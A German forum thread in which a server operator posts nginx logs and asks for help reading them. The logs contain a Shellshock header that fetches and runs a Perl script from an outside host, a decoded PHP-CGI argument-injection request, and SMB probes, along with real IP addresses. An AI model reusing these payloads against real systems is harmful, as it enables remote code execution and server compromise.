NGINX Auswertung eines Kollegen

Hallo ihr lieben,

zunächst mal möchte ich mich Entschuldigen das ich so lange nicht mehr hier war... die Arbeit .... - Sorry.

Ich habe hier einen NGINX Auszug meines Kollegen und hoffe das ihr mir bei der Auswertung helfen könnt.

Bitte verschiebt dieses Thema für den Fall das ich hier im falschem Forum bin.

Zunächst einmal die Logs:


"89.237.75.243 - - [18/Aug/2016:05:08:39 +0200] "GET / HTTP/1.0" 301 178 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
- [18/Aug/2016:05:40:06 +0200] "GET hxxp://180.163.113.82/check_proxy HTTP/1.1" 301 178 "-" "-"
- - [18/Aug/2016:05:44:10 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- - [18/Aug/2016:06:02:22 +0200] "OPTIONS /ipc$ HTTP/1.1" 301 178 "-" "Microsoft-WebDAV-MiniRedir/6.1.7601"
- - [18/Aug/2016:06:04:16 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36"
- - [18/Aug/2016:06:20:15 +0200] "GET /robots.txt HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
- - [18/Aug/2016:06:20:16 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
- - [18/Aug/2016:06:20:17 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
- - [18/Aug/2016:06:31:39 +0200] "GET / HTTP/1.1" 301 178 "hxxp://eupornstar.info/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
- - [18/Aug/2016:06:31:39 +0200] "GET / HTTP/1.1" 301 178 "hxxp://eupornstar.info/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
- - [18/Aug/2016:06:35:53 +0200] "GET / HTTP/1.1" 301 178 "hxxp://education-cz.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
- - [18/Aug/2016:06:35:54 +0200] "GET / HTTP/1.1" 301 178 "hxxp://education-cz.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
- - [18/Aug/2016:06:35:55 +0200] "GET / HTTP/1.1" 301 178 "hxxp://education-cz.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
- - [18/Aug/2016:07:06:13 +0200] "GET hxxp://testp1.piwo.pila.pl/testproxy.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
- - [18/Aug/2016:07:46:22 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +hxxp://www.baidu.com/search/spider.html)"
- - [18/Aug/2016:08:33:29 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- - [18/Aug/2016:10:13:19 +0200] "GET / HTTP/1.1" 301 178 "-" "=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16"
- - [18/Aug/2016:10:28:10 +0200] "GET /js/mage/cookies.js HTTP/1.1" 301 178 "best-bc.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4"
- - [18/Aug/2016:10:29:41 +0200] "HEAD /robots.txt HTTP/1.0" 301 0 "-" "-"
- - [18/Aug/2016:11:07:03 +0200] "OPTIONS /ipc$ HTTP/1.1" 301 178 "-" "Microsoft-WebDAV-MiniRedir/6.1.7601"
- - [18/Aug/2016:11:07:10 +0200] "OPTIONS /ipc$ HTTP/1.1" 301 178 "-" "Microsoft-WebDAV-MiniRedir/6.1.7601"
- - [18/Aug/2016:11:15:16 +0200] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69 %6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%6 4%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
- - [18/Aug/2016:11:32:39 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36"
- - [18/Aug/2016:11:46:04 +0200] "PROPFIND /webdav/ HTTP/1.1" 301 178 "-" "WEBDAV Client"
- - [18/Aug/2016:12:03:45 +0200] "\xFA\xD2\x1Ba\x05-\xE4\x9E\xA57\xC2\xF4x\x8AK\xCB\xA8`6\xEA\xD7\xFCl-|\xD6\x15\x86\xC7\xE2I@\xC8y\xF8\xB57\xEFe\xF2\x19\x8A\xA8\x17/\xC85\xB2\x91}\xC9Y\x8EB^\xA3\x9A\x07\xA9\x80N=\x95&" 400 166 "-" "-"
- [18/Aug/2016:12:26:32 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +hxxp://www.baidu.com/search/spider.html)"
- - [18/Aug/2016:12:41:00 +0200] "GET / HTTP/1.1" 301 178 "hxxp://tver.xrus.org/" "Mozilla/4.0 (compatible; MSIE 4.01; Digital AlphaServer 1000A 4/233; Windows NT; Powered By 64-Bit Alpha Processor)"
- - [18/Aug/2016:12:41:01 +0200] "GET / HTTP/1.1" 301 178 "hxxp://tver.xrus.org/" "Mozilla/4.0 (compatible; MSIE 4.01; Digital AlphaServer 1000A 4/233; Windows NT; Powered By 64-Bit Alpha Processor)"
- [18/Aug/2016:12:58:45 +0200] "\x04\x01\x00P\xB4\xA3qR\x00" 400 166 "-" "-"
- - [18/Aug/2016:13:01:39 +0200] "OPTIONS /ipc$ HTTP/1.1" 301 178 "-" "Microsoft-WebDAV-MiniRedir/6.1.7601"
- [18/Aug/2016:13:10:25 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
- - [18/Aug/2016:13:55:50 +0200] "GET /impressum.html HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://confib.ifmo.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
- - [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://interesnie-faktu.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
- - [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://confib.ifmo.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
- [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://interesnie-faktu.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
- - [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://confib.ifmo.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
- - [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://interesnie-faktu.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
- - [18/Aug/2016:15:34:15 +0200] "\x05\x02\x00\x02" 400 166 "-" "-"
- [18/Aug/2016:15:43:52 +0200] "GET /robots.txt HTTP/1.0" 301 178 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +hxxp://www.seokicks.de/robot.html)"
- - [18/Aug/2016:15:43:54 +0200] "GET / HTTP/1.0" 301 178 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +hxxp://www.seokicks.de/robot.html)"
- [18/Aug/2016:15:44:04 +0200] "GET / HTTP/1.1" 301 178 "hxxp://uptime.com/bestbc.de" "Mozilla/5.0 (compatible; Uptimebot/0.2.35; +hxxp://www.uptime.com/uptimebot)"
- - [18/Aug/2016:16:03:58 +0200] "GET / HTTP/1.1" 301 178 "hxxp://burger-imperia.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36"
- - [18/Aug/2016:16:07:51 +0200] "GET hxxp://testp4.pospr.waw.pl/testproxy.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
- - [18/Aug/2016:16:11:57 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
- - [18/Aug/2016:16:19:39 +0200] "GET /projekte/aktuell/sellnews HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- - [18/Aug/2016:16:19:39 +0200] "GET /projects.htm HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- - [18/Aug/2016:16:19:44 +0200] "GET /index.php?lang=de HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- - [18/Aug/2016:16:19:48 +0200] "GET /weihnachten HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- [18/Aug/2016:16:19:48 +0200] "GET /projekt-scouts.html HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- - [19/Aug/2016:05:31:19 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
- - [19/Aug/2016:05:32:09 +0200] "GET /robots.txt HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
- - [19/Aug/2016:05:32:11 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
- [19/Aug/2016:05:32:19 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
- - - [19/Aug/2016:05:32:19 +0200] "GET /favicon.ico HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
- - - [19/Aug/2016:05:32:21 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
- - - [19/Aug/2016:05:39:11 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- - - [19/Aug/2016:08:35:45 +0200] "GET / HTTP/1.0" 301 178 "-" "www.probethenet.com scanner"
- - - [19/Aug/2016:08:35:45 +0200] "HEAD /redirect.php HTTP/1.0" 301 0 "-" "www.probethenet.com scanner"
-- - [19/Aug/2016:10:00:44 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
- - - [19/Aug/2016:10:25:35 +0200] "GET hxxp://testp1.piwo.pila.pl/testproxy.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
- - [19/Aug/2016:10:31:29 +0200] "PROPFIND /webdav/ HTTP/1.1" 301 178 "-" "WEBDAV Client"
- - [19/Aug/2016:11:31:44 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
- - [19/Aug/2016:12:04:18 +0200] "GET /w00tw00t.at.ISC.SANS.DFind HTTP/1.1" 400 166 "-" "-"
- - [19/Aug/2016:12:05:48 +0200] "GET /w00tw00t.at.ISC.SANS.DFind HTTP/1.1" 400 166 "-" "-"]

"-- - [18/Aug/2016:09:21:00 +0200] "GET / HTTP/1.1" 404 564 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36"
-- - [18/Aug/2016:09:21:01 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:02 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:02 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:02 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:03 +0200] "" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:03 +0200] "" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:04 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:04 +0200] "" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:04 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:05 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:08 +0200] "quit" 400 166 "-" "-"
-- - [18/Aug/2016:09:21:10 +0200] "" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:11 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:12:31:21 +0200] "GET / HTTP/1.1" 404 162 "-" "Python-urllib/2.6"
-- - [18/Aug/2016:12:31:24 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:12:31:32 +0200] "GET / HTTP/1.1" 400 264 "-" "Python-urllib/2.6"
-- - [18/Aug/2016:12:31:33 +0200] "GET / HTTP/1.1" 400 264 "-" "() { :;}; /bin/bash -c \x22wget -qO - hxxp://pinkiceberg.com/.mail | perl ; cd /tmp ; curl -O hxxp://pinkiceberg.com/.mail ; fetch hxxp://pinkiceberg.com/.mail ; perl .mail ;rm -rf .mail* \x22""]

"- - - [18/Aug/2016:05:19:13 +0200] "-" 400 0 "-" "-"
- - - [18/Aug/2016:05:19:14 +0200] "\x00\x00\x00\x85\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE\x00\x00\x00\x00\x00b\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00" 400 166 "-" "-"
- - - [18/Aug/2016:06:02:20 +0200] "-" 400 0 "-" "-"
- - - [18/Aug/2016:06:02:21 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-"
- - [18/Aug/2016:07:07:13 +0200] "-" 400 0 "-" "-"
- - [18/Aug/2016:07:07:19 +0200] "\x00\x00\x00\x85\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE\x00\x00\x00\x00\x00b\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00" 400 166 "-" "-"
- - [18/Aug/2016:08:02:07 +0200] "\x00\x00\x00\x85\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE\x00\x00\x00\x00\x00b\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00" 400 166 "-" "-"
- - [18/Aug/2016:08:53:59 +0200] "-" 400 0 "-" "-"
- - [18/Aug/2016:09:06:00 +0200] "-" 400 0 "-" "-"
- - [18/Aug/2016:09:06:00 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-"
- [18/Aug/2016:10:18:46 +0200] "-" 400 0 "-" "-"
- - [18/Aug/2016:10:35:29 +0200] "-" 400 0 "-" "-"
- [18/Aug/2016:10:35:30 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-"
- - [18/Aug/2016:11:07:01 +0200] "-" 400 0 "-" "-"
- [18/Aug/2016:11:07:02 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-"
- - [18/Aug/2016:11:07:06 +0200] "-" 400 0 "-" "-"
- - [18/Aug/2016:11:07:07 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-"
- [18/Aug/2016:13:01:38 +0200] "-" 400 0 "-" "-"
- [18/Aug/2016:13:01:39 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-""]

Einen Eintrag aus dem 1. Log konnte ich (wenn ich richtig liege) auswerten der sieht das so aus:
- - [18/Aug/2016:11:15:16 +0200] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69 %6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%6 4%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"

=

176.94.194.90 - - [18/Aug/2016:11:15:16 0200] "POST /phppath/php?-d allow_url_include=on -d safe_mode=off -d suhosi n.simulation=on -d disable_functions="" -d open_base%6 4ir=none -d auto_prepend_file=php://input -n HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; hxxp://www.google.com/bot.html)"

Der Ursprung der IP-Adressen scheinen aus China zu stammen. Bei der Auswertung kommen ich leider bei folgenden Einträgen nicht weiter und bisher leider auch keine Idee für eine dekodierung :wall:

- - [18/Aug/2016:12:58:45 +0200] "\x04\x01\x00P\xB4\xA3qR\x00" 400 166 "-" "-"
- - [18/Aug/2016:15:34:15 +0200] "\x05\x02\x00\x02" 400 166 "-" "-"

Auch im Access - Log /var/log/nginx/nginx_devi_access.log habe ich leider keine Idee wo ich dort ansetzen soll.

Auf dem Server läuft Debian 7, nginx 1.2.1 und PHP 5.6.24-1~dotdeb+7.1 (fpm-fcgi)

Vielen Dank für Eure Hilfe
 
Zuletzt bearbeitet:
Code:
180.97.106.37 - - [18/Aug/2016:15:34:15 +0200] "\x05\x02\x00\x02" 400 166 "-" "-"
Dieser Eintrag sieht mir nach einem Versuch aus eine VPN Verbindung herzustellen (ohne Authentifikation).
Siehe: OpenVPN Sock.c
 
Da klopft ein Bot den Server auf mögliche Services und Sicherheitslücken ab. Sowas begegnet einem als Webserver-Betreiber doch ständig in den Logs. Wenn die Kiste auf dem aktuellsten Stand und halbwegs sicher konfiguriert ist, sollte das kein Problem darstellen.

Datenschutz solltet ihr euch dringend aneignen. Weder gibt man Logs mit IP-Adressen drin weiter, noch postet man sie öffentlich in einem Forum.
 
Vielen Dank ihr beiden

@bitmuncher

Werde ich weitergeben obwohl ich jetzt selbst etwas dümmlich hier die Logs gepostet habe ....

Ich gelobe Besserung:)
 
Zurück
Oben